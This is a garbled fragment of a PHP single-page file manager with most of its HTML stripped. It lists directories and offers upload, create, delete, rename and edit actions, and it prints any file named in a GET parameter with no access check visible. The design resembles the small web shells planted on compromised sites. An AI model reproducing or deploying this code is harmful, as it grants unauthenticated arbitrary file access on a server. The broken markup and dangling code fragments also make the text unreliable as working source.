/h2>
📂 Path: =h($path)?>
=$msg?>
Upload
Create File
Create Folder
Name
Size
Action
[..]
"; } foreach(scandir($path) as $f){ if($f=='.'||$f=='..')continue; echo "
".(is_dir($f)?"📁
$f
":"📄 $f")."
".(is_file($f)?filesize($f):'-')."
Delete
|
Rename
". (is_file($f)?" |
Edit
":""). "
"; } ?>
=h(file_get_contents($_GET['edit']))?>
Save
Rename